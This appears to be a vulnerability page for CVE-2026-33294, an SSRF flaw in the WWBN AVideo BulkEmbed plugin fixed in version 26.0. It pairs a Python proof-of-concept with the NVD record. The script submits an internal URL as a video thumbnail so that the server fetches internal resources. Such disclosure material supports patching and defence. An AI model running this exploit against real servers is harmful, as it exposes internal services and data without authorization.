CVE-2026-33294

import requests # Target URL configuration target_host = "http://avideo-example.com" endpoint = "/plugin/BulkEmbed/save.json.php" url = target_host + endpoint # Internal resource to access (e.g., local metadata service) internal_url = "http://127.0.0.1:8080/metadata" # Valid authentication credentials (required) cookies = { "PHPSESSID": "valid_session_cookie_here" } # Payload data payload = { "title": "SSRF Test Video", "url": "http://external-video.com/video.mp4", "thumbnail": internal_url # Malicious internal URL } try: response = requests.post(url, data=payload, cookies=cookies) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the video thumbnail image source to see the response from " + internal_url) else: print("[-] Failed to send request. Status code: " + str(response.status_code)) print(response.text) except Exception as e: print("[-] Error: " + str(e))

{"cve": {"id": "CVE-2026-33294", "sourceIdentifier": "[email protected]", "published": "2026-03-22T17:17:09.100", "lastModified": "2026-03-24T21:14:36.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, the BulkEmbed plugin's save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail. Version 26.0 fixes the issue."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. Antes de la versión 26.0, el endpoint de guardado del plugin BulkEmbed ('plugin/BulkEmbed/save.json.php') obtiene URLs de miniaturas proporcionadas por el usuario a través de 'url_get_contents()' sin protección SSRF. A diferencia de los otros seis endpoints de obtención de URLs en AVideo que fueron reforzados con 'isSSRFSafeURL()', esta ruta de código fue omitida. Un atacante autenticado puede forzar al servidor a realizar solicitudes HTTP a recursos de red internos y recuperar las respuestas al ver la miniatura del video guardado. La versión 26.0 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.0", "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/4589a3a089baf4ea439481f5088b38a8aa9c82b6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-66cw-h2mj-j39p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}